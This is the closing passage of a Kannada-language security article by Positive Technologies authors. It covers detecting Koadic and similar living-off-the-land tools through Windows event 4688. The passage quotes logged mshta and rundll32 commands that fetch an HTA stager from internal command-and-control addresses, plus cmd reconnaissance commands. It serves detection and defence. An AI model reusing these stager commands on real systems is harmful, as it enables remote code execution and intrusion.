ಆರಂಭಿಕ ಸಂಪರ್ಕವನ್ನು ಸ್ಟೇಜರ್ ಮೂಲಕ ಪ್ರಾರಂಭಿಸಲಾಗಿದೆ, ಆದ್ದರಿಂದ ವಿಂಡೋಸ್ ಈವೆಂಟ್‌ಗಳ ಮೂಲಕ ಅದರ ಚಟುವಟಿಕೆಯನ್ನು ಪತ್ತೆಹಚ್ಚಲು ಸಾಧ್ಯವಿದೆ. mshta ಗಾಗಿ, ಇದು ಈವೆಂಟ್ 4688 ಆಗಿದೆ, ಇದು ಪ್ರಾರಂಭದ ಗುಣಲಕ್ಷಣದೊಂದಿಗೆ ಪ್ರಕ್ರಿಯೆಯ ರಚನೆಯನ್ನು ಸೂಚಿಸುತ್ತದೆ:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

ಕೋಡಿಕ್ ಚಾಲನೆಯಲ್ಲಿರುವಾಗ, ನೀವು ಇತರ 4688 ಈವೆಂಟ್‌ಗಳನ್ನು ಅದನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ನಿರೂಪಿಸುವ ಗುಣಲಕ್ಷಣಗಳೊಂದಿಗೆ ನೋಡಬಹುದು:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

ಸಂಶೋಧನೆಗಳು

ಭೂಮಿ ಪ್ರವೃತ್ತಿಯ ಜೀವನವು ಅಪರಾಧಿಗಳಲ್ಲಿ ಜನಪ್ರಿಯತೆಯನ್ನು ಗಳಿಸುತ್ತಿದೆ. ಅವರು ತಮ್ಮ ಅಗತ್ಯಗಳಿಗಾಗಿ ವಿಂಡೋಸ್‌ನಲ್ಲಿ ನಿರ್ಮಿಸಲಾದ ಉಪಕರಣಗಳು ಮತ್ತು ಕಾರ್ಯವಿಧಾನಗಳನ್ನು ಬಳಸುತ್ತಾರೆ. ಈ ತತ್ವವನ್ನು ಅನುಸರಿಸುವ ಜನಪ್ರಿಯ ಪರಿಕರಗಳಾದ Koadic, CrackMapExec ಮತ್ತು Impacket APT ವರದಿಗಳಲ್ಲಿ ಹೆಚ್ಚಾಗಿ ಕಾಣಿಸಿಕೊಳ್ಳುವುದನ್ನು ನಾವು ನೋಡುತ್ತಿದ್ದೇವೆ. ಈ ಪರಿಕರಗಳಿಗಾಗಿ ಗಿಟ್‌ಹಬ್‌ನಲ್ಲಿನ ಫೋರ್ಕ್‌ಗಳ ಸಂಖ್ಯೆಯು ಸಹ ಬೆಳೆಯುತ್ತಿದೆ ಮತ್ತು ಹೊಸವುಗಳು ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತಿವೆ (ಈಗ ಅವುಗಳಲ್ಲಿ ಸುಮಾರು ಸಾವಿರ ಇವೆ). ಪ್ರವೃತ್ತಿಯು ಅದರ ಸರಳತೆಯಿಂದಾಗಿ ಜನಪ್ರಿಯತೆಯನ್ನು ಗಳಿಸುತ್ತಿದೆ: ಆಕ್ರಮಣಕಾರರಿಗೆ ಮೂರನೇ ವ್ಯಕ್ತಿಯ ಉಪಕರಣಗಳು ಅಗತ್ಯವಿಲ್ಲ; ಅವರು ಈಗಾಗಲೇ ಬಲಿಪಶುಗಳ ಯಂತ್ರಗಳಲ್ಲಿದ್ದಾರೆ ಮತ್ತು ಭದ್ರತಾ ಕ್ರಮಗಳನ್ನು ಬೈಪಾಸ್ ಮಾಡಲು ಅವರಿಗೆ ಸಹಾಯ ಮಾಡುತ್ತಾರೆ. ನಾವು ನೆಟ್ವರ್ಕ್ ಸಂವಹನವನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದರ ಮೇಲೆ ಕೇಂದ್ರೀಕರಿಸುತ್ತೇವೆ: ಮೇಲೆ ವಿವರಿಸಿದ ಪ್ರತಿಯೊಂದು ಉಪಕರಣವು ನೆಟ್ವರ್ಕ್ ಟ್ರಾಫಿಕ್ನಲ್ಲಿ ತನ್ನದೇ ಆದ ಕುರುಹುಗಳನ್ನು ಬಿಡುತ್ತದೆ; ಅವರ ವಿವರವಾದ ಅಧ್ಯಯನವು ನಮ್ಮ ಉತ್ಪನ್ನವನ್ನು ಕಲಿಸಲು ನಮಗೆ ಅವಕಾಶ ಮಾಡಿಕೊಟ್ಟಿತು ಪಿಟಿ ನೆಟ್‌ವರ್ಕ್ ಅಟ್ಯಾಕ್ ಡಿಸ್ಕವರಿ ಅವುಗಳನ್ನು ಪತ್ತೆಹಚ್ಚಿ, ಇದು ಅಂತಿಮವಾಗಿ ಅವರನ್ನು ಒಳಗೊಂಡ ಸೈಬರ್ ಘಟನೆಗಳ ಸಂಪೂರ್ಣ ಸರಣಿಯನ್ನು ತನಿಖೆ ಮಾಡಲು ಸಹಾಯ ಮಾಡುತ್ತದೆ.

ಲೇಖಕರು:

  • ಆಂಟನ್ ಟ್ಯುರಿನ್, ತಜ್ಞರ ಸೇವೆಗಳ ವಿಭಾಗದ ಮುಖ್ಯಸ್ಥ, PT ಎಕ್ಸ್ಪರ್ಟ್ ಸೆಕ್ಯುರಿಟಿ ಸೆಂಟರ್, ಧನಾತ್ಮಕ ತಂತ್ರಜ್ಞಾನಗಳು
  • ಎಗೊರ್ ಪೊಡ್ಮೊಕೊವ್, ತಜ್ಞ, ಪಿಟಿ ಎಕ್ಸ್ಪರ್ಟ್ ಸೆಕ್ಯುರಿಟಿ ಸೆಂಟರ್, ಧನಾತ್ಮಕ ತಂತ್ರಜ್ಞಾನಗಳು

ಮೂಲ: www.habr.com

ಕಾಮೆಂಟ್ ಅನ್ನು ಸೇರಿಸಿ